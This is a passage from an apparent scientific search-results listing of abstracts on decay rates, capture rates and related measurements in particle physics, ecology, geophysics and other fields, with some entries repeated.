We report results on partial branching fractions and isospin asymmetries in seven bins of dilepton mass-squared. We further present CP and lepton-flavor asymmetries for dilepton masses below and above the J/ψ resonance. We find no evidence for CP or lepton-flavor violation. The partial branching fractions and isospin asymmetries are consistent with the Standard Model predictions and with results from other experiments. 12. Moments of the B meson inclusive semileptonic decay rate using neutrino reconstruction Csorna, S. E.; Bonvicini, G.; Cinabro, D.; Dubrovin, M.; Bornheim, A.; Lipeles, E.; Pappas, S. P.; Shapiro, A.; Weinstein, A. J.; Briere, R. A.; Chen, G. P.; Ferguson, T.; Tatishvili, G.; Vogel, H.; Watkins, M. E.; Adam, N. E.; Alexander, J. P.; Berkelman, K.; Boisvert, V.; Cassel, D. G.; Duboscq, J. E.; Ecklund, K. M.; Ehrlich, R.; Galik, R. S.; Gibbons, L.; Gittelman, B.; Gray, S. W.; Hartill, D. L.; Heltsley, B. K.; Hsu, L.; Jones, C. D.; Kandaswamy, J.; Kreinick, D. L.; Kuznetsov, V. E.; Magerkurth, A.; Mahlke-Krüger, H.; Meyer, T. O.; Patterson, J. R.; Pedlar, T. K.; Peterson, D.; Pivarski, J.; Riley, D.; Sadoff, A. J.; Schwarthoff, H.; Shepherd, M. R.; Sun, W. M.; Thayer, J. G.; Urner, D.; Wilksen, T.; Weinberger, M.; Athar, S. B.; Avery, P.; Breva-Newell, L.; Potlia, V.; Stoeck, H.; Yelton, J.; Eisenstein, B. I.; Gollin, G. D.; Karliner, I.; Lowrey, N.; Naik, P.; Sedlack, C.; Selen, M.; Thaler, J. J.; Williams, J.; Edwards, K. W.; Besson, D.; Gao, K. Y.; Gong, D. T.; Kubota, Y.; Li, S. Z.; Poling, R.; Scott, A. W.; Smith, A.; Stepaniak, C. J.; Urheim, J.; Metreveli, Z.; Seth, K. K.; Tomaradze, A.; Zweber, P.; Ernst, J.; Arms, K.; Eckhart, E.; Gan, K. K.; Gwon, C.; Severini, H.; Skubic, P.; Asner, D. M.; Dytman, S. A.; Mehrabyan, S.; Mueller, J. A.; Nam, S.; Savinov, V.; Huang, G. S.; Miller, D. H.; Pavlunin, V.; Sanghi, B.; Shibata, E. I.; Shipsey, I. P.; Adams, G. S.; Chasse, M.; Cummings, J. P.; Danko, I.; Napolitano, J.; Cronin-Hennessy, D.; Park, C. S.; Park, W.; Thayer, J. B.; Thorndike, E. H.; Coan, T. E.; Gao, Y. S.; Liu, F.; Stroynowski, R.; Artuso, M.; Boulahouache, C.; Blusk, S.; Butt, J.; Dambasuren, E.; Dorjkhaidav, O.; Haynes, J.; Menaa, N.; Mountain, R.; Muramatsu, H.; Nandakumar, R.; Redjimi, R.; Sia, R.; Skwarnicki, T.; Stone, S.; Wang, J. C.; Zhang, Kevin; Mahmood, A. H. 2004-08-01 We present a measurement of the composition of B meson inclusive semileptonic decays using 9.4 fb-1 of e+e- data taken with the CLEO detector at the Υ(4S) resonance. In addition to measuring the charged lepton kinematics, the neutrino four-vector is inferred using the hermiticity of the detector. We perform a maximum likelihood fit over the full three-dimensional differential decay distribution for the fractional contributions from the B→Xclν processes with Xc=D, D*, D**, and nonresonant Xc, and the process B→Xulν. From the fit results we extract the first and second moments of the M2X and q2 distributions with minimum lepton-energy requirements of 1.0 GeV and 1.5 GeV. We find =(0.456±0.014±0.045±0.109) GeV2/c4 with a minimum lepton energy of 1.0 GeV and =(0.293±0.012±0.033±0.048) GeV2/c4 with minimum lepton energy of 1.5 GeV. The uncertainties are from statistics, detector systematic effects, and model dependence, respectively. As a test of the HQET and OPE calculations, the results for the M2X moment as a function of the minimum lepton energy requirement are compared to the predictions. 13. Air sampling by pumping through a filter: effects of air flow rate, concentration, and decay of airborne substances. PubMed Šoštarić, Marko; Petrinec, Branko; Babić, Dinko 2016-12-01 This paper tackles the issue of interpreting the number of airborne particles adsorbed on a filter through which a certain volume of sampled air has been pumped. This number is equal to the product of the pumped volume and particle concentration in air, but only if the concentration is constant over time and if there is no substance decomposition on the filter during sampling. If this is not the case, one must take into account the inconstancy of the concentration and the decay law for a given substance, which is complicated even further if the flow rate through the filter is not constant. In this paper, we develop a formalism which considers all of these factors, resulting in a single, compact expression of general applicability. The use of this expression is exemplified by addressing a case of sampling airborne radioactive matter, where the decay law is already well known. This law is combined with three experimentally observed time dependence of the flow rate and two models for the time dependence of the particle concentration. We also discuss the implications of these calculations for certain other situations of interest to environmental studies. 14. Capturing Age-group Differences and Developmental Change with the BASC Parent Rating Scales PubMed Central Barbot, Baptiste; Hein, Sascha; Luthar, Suniya S.; Grigorenko, Elena L. 2014-01-01 Estimation of age-group differences and intra-individual change across distinct developmental periods is often challenged by the use of age-appropriate (but non-parallel) measures. We present a short version of the Behavior Assessment System (Reynolds & Kamphaus, 1998), Parent Rating Scales for Children (PRS-C) and Adolescents (PRS-A), which uses only their common-items to derive estimates of the initial constructs optimized for developmental studies. Measurement invariance of a three-factor model (Externalizing, Internalizing, Adaptive Skills) was tested across age-groups (161 mothers using PRS-C; 200 mothers using PRS-A) and over time (115 mothers using PRS-C at baseline and PRS-A five years later) with the original versus short PRS. Results indicated that the short PRS holds a sufficient level of invariance for a robust estimation of age-group differences and intra-individual change, as compared to the original PRS, which held only weak invariance leading to flawed developmental inferences. Importance of test-content parallelism for developmental studies is discussed. PMID:25045196 15. Low temperature rate constants for the N + CN → N2 + C reaction: two-dimensional quantum capture calculations on an accurate potential energy surface. PubMed Ma, Jianyi; Guo, Hua; Dawes, Richard 2012-09-21 The title reaction is thought to be responsible for the production of molecular nitrogen in interstellar clouds. In this work, we report quantum capture calculations on a new two-dimensional potential energy surface determined by interpolating high-level ab initio data. The low-temperature rate constant calculated using a capture model is quite large and has a positive temperature dependence, in agreement with a recent experiment. The origin of the aforementioned behaviors of the rate constant is analyzed. 16. Estimation of peacock bass (Cichla spp.) mortality rate during catch-release fishing employing different post-capture procedures. PubMed Barroco, L S A; Freitas, C E C; Lima, Á C 2017-08-17 The effect of catch-and-release fishing on the survival of peacock bass (Cichla spp.) was evaluated by comparing two types of artificial bait (jig and shallow-diver plugs) and two types of post-catch confinement. Two experiments were conducted during the periods January-February and October-November 2012 in the Unini River, a right-bank tributary of the Negro River. In total, 191 peacock bass were captured. Both groups of fish were subjected to experimental confinement (collective and individual) for three days. Additionally, 11 fish were tagged with radio transmitters for telemetry monitoring. Mortality rate was estimated as the percentage of dead individuals for each type of bait and confinement. For peacock bass caught with jig baits, mortality was zero. The corresponding figure for shallow-diver bait was 1.66% for fish in collective containment, 18.18% for fish monitored by telemetry and 0% for individuals confined individually. Our results show low post-release mortality rates for peacock bass. Furthermore, neither the type of confinement nor the type of bait had a statistically significant influence on mortality rates. While future studies could include other factors in the analysis, our results show that catch-and-release fishing results in low mortality rates. 17. EFFECTS OF TURBULENCE, ECCENTRICITY DAMPING, AND MIGRATION RATE ON THE CAPTURE OF PLANETS INTO MEAN MOTION RESONANCE SciTech Connect Ketchum, Jacob A.; Adams, Fred C.; Bloch, Anthony M. 2011-01-01 Pairs of migrating extrasolar planets often lock into mean motion resonance as they drift inward. This paper studies the convergent migration of giant planets (driven by a circumstellar disk) and determines the probability that they are captured into mean motion resonance. The probability that such planets enter resonance depends on the type of resonance, the migration rate, the eccentricity damping rate, and the amplitude of the turbulent fluctuations. This problem is studied both through direct integrations of the full three-body problem and via semi-analytic model equations. In general, the probability of resonance decreases with increasing migration rate, and with increasing levels of turbulence, but increases with eccentricity damping. Previous work has shown that the distributions of orbital elements (eccentricity and semimajor axis) for observed extrasolar planets can be reproduced by migration models with multiple planets. However, these results depend on resonance locking, and this study shows that entry into-and maintenance of-mean motion resonance depends sensitively on the migration rate, eccentricity damping, and turbulence. 18. A measurement of the 2 neutrino double beta decay rate of Te-130 in the CUORICINO experiment SciTech Connect Kogler, Laura K. 2011-11-30 CUORICINO was a cryogenic bolometer experiment designed to search for neutrinoless double beta decay and other rare processes, including double beta decay with two neutrinos (2vββ). The experiment was located at Laboratori Nazionali del Gran Sasso and ran for a period of about 5 years, from 2003 to 2008. The detector consisted of an array of 62 TeO2 crystals arranged in a tower and operated at a temperature of 10 mK. Events depositing energy in the detectors, such as radioactive decays or impinging particles, produced thermal pulses in the crystals which were read out using sensitive thermistors. The experiment included 4 enriched crystals, 2 enriched with 130Te and 2 with 128Te, in order to aid in the measurement of the 2vββ rate. The enriched crystals contained a total of 350 g 130Te. The 128-enriched (130-depleted) crystals were used as background monitors, so that the shared backgrounds could be subtracted from the energy spectrum of the 130- enriched crystals. Residual backgrounds in the subtracted spectrum were fit using spectra generated by Monte-Carlo simulations of natural radioactive contaminants located in and on the crystals. The 2vββ half-life was measured to be T2v1/2 = [9.81± 0.96(stat)± 0.49(syst)] x1020 y. 19. Effects of Biogents Sentinel Trap Field Placement on Capture Rates of Adult Asian Tiger Mosquitoes, Aedes albopictus PubMed Central Crepeau, Taryn N.; Healy, Sean P.; Bartlett-Healy, Kristen; Unlu, Isik; Farajollahi, Ary; Fonseca, Dina M. 2013-01-01 20. Precision measurement of the decay rate of {sup 7}Be in host materials SciTech Connect Nir-El, Y.; Haquin, G.; Yungreiss, Z.; Hass, M.; Goldring, G.; Chamoli, S. K.; Singh, B. S. Nara; Lakshmi, S.; Koester, U.; Champault, N.; Dorsival, A.; Fedoseyev, V. N.; Georgiev, G.; Schumann, D.; Heidenreich, G.; Teichmann, S. 2007-01-15 A controlled and precise determination of the cross sections of the fusion reactions {sup 7}Be(p,{gamma}){sup 8}B and {sup 3}He({sup 4}He,{gamma}){sup 7}Be, which play an important role in determining the solar neutrino flux, necessitates the knowledge of a precise value of the electron-capture half-life of {sup 7}Be. This half-life may depend on the material hosting the {sup 7}Be atoms via small modifications of the electron density around the {sup 7}Be nucleus. In this brief communication we report on the measurement of {sup 7}Be implanted in four materials: copper, aluminum, sapphire, and PVC. The four results are consistent with a null host dependence within two standard deviations and their weighted average of 53.236(39) d agrees very well with the adopted value in the literature, 53.22(6) d. The present results may exhibit a slight (0.22%) increase of the half-life at room temperature for metals compared to insulators that requires further studies. 1. Λ_{c}→Λl^{+}ν_{l} Form Factors and Decay Rates from Lattice QCD with Physical Quark Masses. PubMed Meinel, Stefan 2017-02-24 The first lattice QCD calculation of the form factors governing Λ_{c}→Λℓ^{+}ν_{ℓ} decays is reported. The calculation was performed with two different lattice spacings and includes one ensemble with a pion mass of 139(2) MeV. The resulting predictions for the Λ_{c}→Λe^{+}ν_{e} and Λ_{c}→Λμ^{+}ν_{μ} decay rates divided by |V_{cs}|^{2} are 0.2007(71)(74) and 0.1945(69)(72)  ps^{-1}, respectively, where the two uncertainties are statistical and systematic. Taking the Cabibbo-Kobayashi-Maskawa (CKM) matrix element |V_{cs}| from a global fit and the Λ_{c} lifetime from experiments, this translates to branching fractions of B(Λ_{c}→Λe^{+}ν_{e})=0.0380(19)_{LQCD}(11)_{τ_{Λ_{c}}} and B(Λ_{c}→Λμ^{+}ν_{μ})=0.0369(19)_{LQCD}(11)_{τ_{Λ_{c}}}. These results are consistent with, and two times more precise than, the measurements performed recently by the BESIII Collaboration. Using instead the measured branching fractions together with the lattice calculation to determine the CKM matrix element gives |V_{cs}|=0.949(24)_{LQCD}(14)_{τ_{Λ_{c}}}(49)_{B}. 2. Λc→Λ l+νl Form Factors and Decay Rates from Lattice QCD with Physical Quark Masses Meinel, Stefan 2017-02-01 The first lattice QCD calculation of the form factors governing Λc→Λ ℓ+νℓdecays is reported. The calculation was performed with two different lattice spacings and includes one ensemble with a pion mass of 139(2) MeV. The resulting predictions for the Λc→Λe +νe and Λc→Λ μ+νμ decay rates divided by |Vc s|2 are 0.2007(71)(74) and 0.1945 (69 )(72 ) ps-1 , respectively, where the two uncertainties are statistical and systematic. Taking the Cabibbo-Kobayashi-Maskawa (CKM) matrix element |Vc s| from a global fit and the Λc lifetime from experiments, this translates to branching fractions of B (Λc→Λ e+νe)=0.0380 (19 )LQCD(11 )τ Λ c and B (Λc→Λ μ+νμ)=0.0369 (19 )LQCD(11 )τΛc . These results are consistent with, and two times more precise than, the measurements performed recently by the BESIII Collaboration. Using instead the measured branching fractions together with the lattice calculation to determine the CKM matrix element gives |Vc s|=0.949 (24 )LQCD(14 )τΛc(49 )B . 3. Damping rates of surface plasmons for particles of size from nano- to micrometers; reduction of the nonradiative decay Kolwas, K.; Derkachova, A. 2013-01-01 Damping rates of multipolar, localized surface plasmons (SPs) of gold and silver nanospheres of radii up to 1000 nm were found with the tools of classical electrodynamics. The significant increase in damping rates followed by noteworthy decrease for larger particles takes place along with substantial red-shift of plasmon resonance frequencies as a function of particle size. We also introduced interface damping into our modeling, which substantially modifies the plasmon damping rates of smaller particles. We demonstrate unexpected reduction of the multipolar SP damping rates in certain size ranges. This effect can be explained by the suppression of the nonradiative decay channel as a result of the lost competition with the radiative channel. We show that experimental dipole damping rates [H. Baida, et al., Nano Lett. 9(10) (2009) 3463, and C. Sönnichsen, et al., Phys. Rev. Lett. 88 (2002) 077402], and the resulting resonance quality factors can be described in a consistent and straightforward way within our modeling extended to particle sizes still unavailable experimentally. 4. Joint Inversion of Gravity and Gravity Tensor Data Using the Structural Index as Weighting Function Rate Decay Ialongo, S.; Cella, F.; Fedi, M.; Florio, G. 2011-12-01 Most geophysical inversion problems are characterized by a number of data considerably higher than the number of the unknown parameters. This corresponds to solve highly underdetermined systems. To get a unique solution, a priori information must be therefore introduced. We here analyze the inversion of the gravity gradient tensor (GGT). Previous approaches to invert jointly or independently more gradient components are by Li (2001) proposing an algorithm using a depth weighting function and Zhdanov et alii (2004), providing a well focused inversion of gradient data. Both the methods give a much-improved solution compared with the minimum length solution, which is invariably shallow and not representative of the true source distribution. For very undetermined problems, this feature is due to the role of the depth weighting matrices used by both the methods. Recently, Cella and Fedi (2011) showed however that for magnetic and gravity data the depth weighting function has to be defined carefully, under a preliminary application of Euler Deconvolution or Depth from Extreme Point methods, yielding the appropriate structural index and then using it as the rate decay of the weighting function. We therefore propose to extend this last approach to invert jointly or independently the GGT tensor using the structural index as weighting function rate decay. In case of a joint inversion, gravity data can be added as well. This multicomponent case is also relevant because the simultaneous use of several components and gravity increase the number of data and reduce the algebraic ambiguity compared to the inversion of a single component. The reduction of such ambiguity was shown in Fedi et al, (2005) decisive to get an improved depth resolution in inverse problems, independently from any form of depth weighting function. The method is demonstrated to synthetic cases and applied to real cases, such as the Vredefort impact area (South Africa), characterized by a complex density 5. Nuclear mass inventory, photon dose rate and thermal decay heat of spent research reactor fuel assemblies SciTech Connect Pond, R.B.; Matos, J.E. 1996-05-01 As part of the Department of Energy`s spent nuclear fuel acceptance criteria, the mass of uranium and transuranic elements in spent research reactor fuel must be specified. These data are, however, not always known or readily determined. It is the purpose of this report to provide estimates of these data for some of the more common research reactor fuel assembly types. The specific types considered here are MTR, TRIGA and DIDO fuel assemblies. The degree of physical protection given to spent fuel assemblies is largely dependent upon the photon dose rate of the spent fuel material. These data also, are not always known or readily determined. Because of a self-protecting dose rate level of radiation (dose rate greater than 100 ren-x/h at I m in air), it is important to know the dose rate of spent fuel assemblies at all time. Estimates of the photon dose rate for spent MTR, TRIGA and DIDO-type fuel assemblies are given in this report. 6. Alpha-decay branching ratios of near-threshold states in 19Ne and the astrophysical rate of 15O(α,γ)19Ne Davids, B.; van den Berg, A. M.; Dendooven, P.; Fleurot, F.; Hunyadi, M.; de Huu, M. A.; Rehm, K. E.; Segel, R. E.; Siemssen, R. H.; Wilschut, H. W.; Wörtche, H. J.; Wuosmaa, A. H. 2003-05-01 The 15O(α, γ)19Ne reaction is one of two routes for breakout from the hot CNO cycles into the rp process in accreting neutron stars. Its astrophysical rate depends critically on the decay properties of excited states in 19Ne lying just above the 15O + α threshold. We have measured the α-decay branching ratios for these states using the p(21Ne,t)19Ne reaction at 43 MeV/u. 7. Periodic solutions of piecewise affine gene network models with non uniform decay rates: the case of a negative feedback loop. PubMed Farcot, Etienne; Gouzé, Jean-Luc 2009-12-01 This paper concerns periodic solutions of a class of equations that model gene regulatory networks. Unlike the vast majority of previous studies, it is not assumed that all decay rates are identical. To handle this more general situation, we rely on monotonicity properties of these systems. Under an alternative assumption, it is shown that a classical fixed point theorem for monotone, concave operators can be applied to these systems. The required assumption is expressed in geometrical terms as an alignment condition on so-called focal points. As an application, we show the existence and uniqueness of a stable periodic orbit for negative feedback loop systems in dimension 3 or more, and of a unique stable equilibrium point in dimension 2. This extends a theorem of Snoussi, which showed the existence of these orbits only. 8. Longitudinal T1 relaxation rate (R1) captures changes in short-term Mn exposure in welders. PubMed Lewis, Mechelle M; Flynn, Michael R; Lee, Eun-Young; Van Buren, Scott; Van Buren, Eric; Du, Guangwei; Fry, Rebecca C; Herring, Amy H; Kong, Lan; Mailman, Richard B; Huang, Xuemei 2016-12-01 We demonstrated recently that the T1 relaxation rate (R1) captured short-term Mn exposure in welders with chronic, relatively low exposure levels in a cross-sectional study. In the current study, we used a longitudinal design to examine whether R1 values reflect the short-term dynamics of Mn exposure. Twenty-nine welders were evaluated at baseline and 12 months. Occupational questionnaires estimated short-term welding exposure using welding hours in the 90days prior to each study visit (HrsW90). In addition, blood Mn levels, the pallidal index (PI; globus pallidus T1-weighted intensity (T1WI)/frontal white matter T1WI), and R1 values in brain regions of interest (ROIs) were determined as Mn biomarkers at each visit. Associations between changes in estimated welding exposure and changes in purported Mn biomarkers were assessed by Spearman's correlations with adjustment for age and baseline R1, HrsW90, and blood Mn values. Changes in welding hours (HrsW90: the short-term welding exposure estimate), was associated significantly with changes in R1 values in the putamen (r=0.541, p=0.005), caudate (R=0.453, p=0.023), globus pallidus (R=0.430, p=0.032), amygdala (R=0.461, p=0.020), and hippocampus (R=0.447, p=0.025), but not with changes in blood Mn levels or the PI. Changes in R1 values correlated with changes in the short-term welding exposure estimate, but not with more traditional measures of Mn exposure (blood Mn levels or PI). These results suggest that R1 may serve as a useful marker to capture the short-term dynamics in Mn brain accumulation related to welding exposure. Copyright © 2016 Elsevier B.V. All rights reserved. 9. The β-decay rates of 59Fe isotopes in shell burning environments and their influences on the production of 60Fe in massive star Li, K.; Lam, Y. H.; Qi, C.; Tang, X.; Zhang, N. 2016-02-01 The experimental B(GT) strengths of the 59Fe excited states were employed to determine the transition strengths which greatly contribute 59Fe stellar β-decay at typical carbon shell burning temperature. The result has been compared with the theoretical rates FFN (Fuller-Fowler-Newman) and LMP (Langanke&Martinez-Pinedo). Impact of the newly determined rate on the synthesis of cosmic γ emitter 60Fe has also been studied using one-zone model calculation. Our results show 59Fe stellar β-decay rate plays an important role in the 60Fe nucleosynthesis. However the uncertainty of the decay rate is rather large due to the error of B(GT) strength that requires further studies. 10. Detection and decay rates of prey and prey symbionts in the gut of a predator through metagenomics. PubMed Paula, Débora P; Linard, Benjamin; Andow, David A; Sujii, Edison R; Pires, Carmen S S; Vogler, Alfried P 2015-07-01 DNA methods are useful to identify ingested prey items from the gut of predators, but reliable detection is hampered by low amounts of degraded DNA. PCR-based methods can retrieve minute amounts of starting material but suffer from amplification biases and cross-reactions with the predator and related species genomes. Here, we use PCR-free direct shotgun sequencing of total DNA isolated from the gut of the harlequin ladybird Harmonia axyridis at five time points after feeding on a single pea aphid Acyrthosiphon pisum. Sequence reads were matched to three reference databases: Insecta mitogenomes of 587 species, including H. axyridis sequenced here; A. pisum nuclear genome scaffolds; and scaffolds and complete genomes of 13 potential bacterial symbionts. Immediately after feeding, multicopy mtDNA of A. pisum was detected in tens of reads, while hundreds of matches to nuclear scaffolds were detected. Aphid nuclear DNA and mtDNA decayed at similar rates (0.281 and 0.11 h(-1) respectively), and the detectability periods were 32.7 and 23.1 h. Metagenomic sequencing also revealed thousands of reads of the obligate Buchnera aphidicola and facultative Regiella insecticola aphid symbionts, which showed exponential decay rates significantly faster than aphid DNA (0.694 and 0.80 h(-1) , respectively). However, the facultative aphid symbionts Hamiltonella defensa, Arsenophonus spp. and Serratia symbiotica showed an unexpected temporary increase in population size by 1-2 orders of magnitude in the predator guts before declining. Metagenomics is a powerful tool that can reveal complex relationships and the dynamics of interactions among predators, prey and their symbionts. © 2014 John Wiley & Sons Ltd. 11. Survival rate estimation in the presence of tag loss using joint analysis of capture-recapture and resighting data USGS Publications Warehouse Nichols, J.D.; Hines, J.E.; Lebreton, J.-D.; North, P.M. 1993-01-01 Studies using resightings of marked birds typically make use of readily-observable tags that are not retained as well as metal legbands. We review methods for estimating survival rate with open capture-recapture / resighting models when tag loss is not negligible. All methods rely on data from double-banding studies, usually carried out as part of the resighting study by application of metal legbands to all birds marked with alternative markers. When tag loss is homogeneous, the methods of Arnason and Mills (1981) and Pollock (1981) can be used. When rates of tag loss depend on time since marking, then a cohort approach can be used and is similar to the methods appropriate for homogeneous tag loss. In addition, Kremers (1987) and Nichols et al. (1992) developed models for the joint analysis of recapture and resighting data in the presence of tag loss. We emphasize the importance of obtaining recapture data in observation-based studies in which tag loss is likely to be a problem. We discuss the allocation of effort to recaptures and resightings for such studies. 12. Results of experiments devoted to searches for 2K capture on {sup 78}Kr and for the double-beta decay of {sup 136}Xe with the aid of proportional counters SciTech Connect Gavrilyuk, Yu. M.; Gangapshev, A. M.; Zhantudueva, Dj. A.; Kazalov, V. V.; Kuz'minov, V. V.; Panasenko, S. I.; Ratkevich, S. S.; Efendiev, K. V.; Yakimenko, S. P. 2013-09-15 A brief description of two low-background setups deployed at the Baksan Neutrino Observatory (Institute for Nuclear Research, Russian Academy of Sciences) and intended for searches for two types of double-beta decay of inert-gas isotopes-2K capture on {sup 78}Kr and the double-beta decay of {sup 136}Xe-is given. The two setups in question have similar structures and employ identical large high-pressure copper proportional counters as detectors. Upon a treatment of data from measurements with krypton samples differing in the content of the isotope {sup 78}Kr, the spectrum for an enriched sample revealed an excess of events at a statistical-significance level of about two standard deviations (2{sigma}). If one attributes this excess to 2K(2{nu}) capture on {sup 78}Kr, the respective half-life is T{sub 1/2} = 1.4{sub -0.7}{sup +2.3} Multiplication-Sign 10{sup 22} yr at a 90% C.L. A treatment of data from measurements with xenon samples differing in content of the isotope {sup 136}Xe led to the appearance of an excess of events in the spectrum for an enriched sample at a statistical-significance level of about 2.2{sigma}. If one assumes that this excess is due to the two-neutrino double-beta decay of {sup 136}Xe, then the respective half-life is T{sub 1/2} = 5.8{sub -1.8}{sup +4.7} Multiplication-Sign 10{sup 21} yr. 13. Discriminating the Drivers of Edge Effects on Nest Predation: Forest Edges Reduce Capture Rates of Ship Rats (Rattus rattus), a Globally Invasive Nest Predator, by Altering Vegetation Structure PubMed Central Ruffell, Jay; Didham, Raphael K.; Barrett, Paul; Gorman, Nic; Pike, Rhonda; Hickey-Elliott, Andrée; Sievwright, Karin; Armstrong, Doug P. 2014-01-01 Forest edges can strongly affect avian nest success by altering nest predation rates, but this relationship is inconsistent and context dependent. There is a need for researchers to improve the predictability of edge effects on nest predation rates by examining the mechanisms driving their occurrence and variability. In this study, we examined how the capture rates of ship rats, an invasive nest predator responsible for avian declines globally, varied with distance from the forest edge within forest fragments in a pastoral landscape in New Zealand. We hypothesised that forest edges would affect capture rates by altering vegetation structure within fragments, and that the strength of edge effects would depend on whether fragments were grazed by livestock. We measured vegetation structure and rat capture rates at 488 locations ranging from 0–212 m from the forest edge in 15 forest fragments, seven of which were grazed. Contrary to the vast majority of previous studies of edge effects on nest predation, ship rat capture rates increased with increasing distance from the forest edge. For grazed fragments, capture rates were estimated to be 78% lower at the forest edge than 118 m into the forest interior (the farthest distance for grazed fragments). This relationship was similar for ungrazed fragments, with capture rates estimated to be 51% lower at the forest edge than 118 m into the forest interior. A subsequent path analysis suggested that these ‘reverse’ edge effects were largely or entirely mediated by changes in vegetation structure, implying that edge effects on ship rats can be predicted from the response of vegetation structure to forest edges. We suggest the occurrence, strength, and direction of edge effects on nest predation rates may depend on edge-driven changes in local habitat when the dominant predator is primarily restricted to forest patches. PMID:25412340 14. Discriminating the drivers of edge effects on nest predation: forest edges reduce capture rates of ship rats (Rattus rattus), a globally invasive nest predator, by altering vegetation structure. PubMed Ruffell, Jay; Didham, Raphael K; Barrett, Paul; Gorman, Nic; Pike, Rhonda; Hickey-Elliott, Andrée; Sievwright, Karin; Armstrong, Doug P 2014-01-01 Forest edges can strongly affect avian nest success by altering nest predation rates, but this relationship is inconsistent and context dependent. There is a need for researchers to improve the predictability of edge effects on nest predation rates by examining the mechanisms driving their occurrence and variability. In this study, we examined how the capture rates of ship rats, an invasive nest predator responsible for avian declines globally, varied with distance from the forest edge within forest fragments in a pastoral landscape in New Zealand. We hypothesised that forest edges would affect capture rates by altering vegetation structure within fragments, and that the strength of edge effects would depend on whether fragments were grazed by livestock. We measured vegetation structure and rat capture rates at 488 locations ranging from 0-212 m from the forest edge in 15 forest fragments, seven of which were grazed. Contrary to the vast majority of previous studies of edge effects on nest predation, ship rat capture rates increased with increasing distance from the forest edge. For grazed fragments, capture rates were estimated to be 78% lower at the forest edge than 118 m into the forest interior (the farthest distance for grazed fragments). This relationship was similar for ungrazed fragments, with capture rates estimated to be 51% lower at the forest edge than 118 m into the forest interior. A subsequent path analysis suggested that these 'reverse' edge effects were largely or entirely mediated by changes in vegetation structure, implying that edge effects on ship rats can be predicted from the response of vegetation structure to forest edges. We suggest the occurrence, strength, and direction of edge effects on nest predation rates may depend on edge-driven changes in local habitat when the dominant predator is primarily restricted to forest patches. 15. Elevated tropospheric CO2 and O3 may not alter initial wood decomposition rate or wood-decaying fungal community composition of Northern hardwoods Treesearch Emmanuel Ebanyenle; Andrew J. Burton; Andrew J. Storer; Dana L. Richter; Jessie A. Glaeser 2016-01-01 We examined the effects of elevated CO2 and/or O3 on the wood-decaying basidiomycete fungal community and wood decomposition rates at the Aspen Free-Air CO2 and O3 Enrichment (Aspen FACE) project. Mass loss rates were determined after one year of log decomposition on the soil... 16. The effects of ultra-strong magnetic fields on electron capture rates for iron group nuclei in the outer crust of magnetars Du, Jun; Luo, Zhi-Quan; Zhang, Jie 2014-06-01 Based on the work of Wang et al. (Chin. Phys. Lett. 29:049701, 2012), we re-investigated electron capture on iron group nuclei in the outer crust of magnetars and studied magnetar evolution. Effects of ultra-strong magnetic field on electron capture rates for 57Co have been analyzed in the nuclear shell model and under the Landau-level-quantization approximation, and the electron capture rates and the neutrino energy loss rates on iron group nuclei in the outer crust of magnetar have been calculated. The results show that electron capture rates on 57Co are increase greatly in the ultra-strong magnetic field, and above 3 orders of magnitude generally; and the neutrino energy loss rates by electron capture on iron group nuclei increase above 3 orders of magnitude in the range from B=4.414×1013 G to B=4.414×1015 G. These conclusions play an important role in future studying the evolution of magnetar. Furthermore, we modify the expressions of the electron chemical potential (Fermi energy) and phase space factor by introducing Dirac δ-function, and select appropriate parameters of temperature T, magnetic field B and matter density ρ in the our crust, thus our results will be reliable than those of Wang et al. 17. The integrated statistical rate function for superallowed Fermi ß-decays Szybisz, Leszek 1984-09-01 The impact that recently pointed out differences between the two sets of imtegrated statistical rate functions, i.e. f- values, calculated according to the widely adopted methods of Behrens, Jänecke and Bühring and Towner and Hardy have on the internal consistency of Ft-values of the eight best measured superallowed Fermi ß-transitions is analyzed. We find that, due to the dramatic improvement in the accuracy of experimental data, both sets of Ft-values show a statistical difference. In addition, we evaluate the second-forbidden corrections using an alternative way proposed by Jaus. This latter prescription yields results in good agreement with those obtained using the procedure of Behrens, Jänecke and Bühring. The author thanks Dr. H. Behrens for enlightening discussions. 18. Decay Rates to Equilibrium for Nonlinear Plate Equations with Degenerate, Geometrically-Constrained Damping SciTech Connect Geredeli, Pelin G.; Webster, Justin T. 2013-12-15 We analyze the convergence to equilibrium of solutions to the nonlinear Berger plate evolution equation in the presence of localized interior damping (also referred to as geometrically constrained damping). Utilizing the results in (Geredeli et al. in J. Differ. Equ. 254:1193–1229, 2013), we have that any trajectory converges to the set of stationary points N . Employing standard assumptions from the theory of nonlinear unstable dynamics on the set N , we obtain the rate of convergence to an equilibrium. The critical issue in the proof of convergence to equilibria is a unique continuation property (which we prove for the Berger evolution) that provides a gradient structure for the dynamics. We also consider the more involved von Karman evolution, and show that the same results hold assuming a unique continuation property for solutions, which is presently a challenging open problem. 19. Time since death and decay rate constants of Norway spruce and European larch deadwood in subalpine forests determined using dendrochronology and radiocarbon dating Petrillo, M.; Cherubini, P.; Fravolini, G.; Ascher, J.; Schärer, M.; Synal, H.-A.; Bertoldi, D.; Camin, F.; Larcher, R.; Egli, M. 2015-09-01 Due to the large size and highly heterogeneous spatial distribution of deadwood, the time scales involved in the coarse woody debris (CWD) decay of Picea abies (L.) Karst. and Larix decidua Mill. in Alpine forests have been poorly investigated and are largely unknown. We investigated the CWD decay dynamics in an Alpine valley in Italy using the five-decay class system commonly employed for forest surveys, based on a macromorphological and visual assessment. For the decay classes 1 to 3, most of the dendrochronological samples were cross-dated to assess the time that had elapsed since tree death, but for decay classes 4 and 5 (poorly preserved tree rings) and some others not having enough tree rings, radiocarbon dating was used. In addition, density, cellulose and lignin data were measured for the dated CWD. The decay rate constants for spruce and larch were estimated on the basis of the density loss using a single negative exponential model. In the decay classes 1 to 3, the ages of the CWD were similar varying between 1 and 54 years for spruce and 3 and 40 years for larch with no significant differences between the classes; classes 1-3 are therefore not indicative for deadwood age. We found, however, distinct tree species-specific differences in decay classes 4 and 5, with larch CWD reaching an average age of 210 years in class 5 and spruce only 77 years. The mean CWD rate constants were 0.012 to 0.018 yr-1 for spruce and 0.005 to 0.012 yr-1 for larch. Cellulose and lignin time trends half-lives (using a multiple-exponential model) could be derived on the basis of the ages of the CWD. The half-lives for cellulose were 21 yr for spruce and 50 yr for larch. The half-life of lignin is considerably higher and may be more than 100 years in larch CWD. 20. Wobbly strings: calculating the capture rate of a webcam using the rolling shutter effect in a guitar Cunnah, David 2014-07-01 In this paper I propose a method of calculating the time between line captures in a standard complementary metal-oxide-semiconductor (CMOS) webcam using the rolling shutter effect when filming a guitar. The exercise links 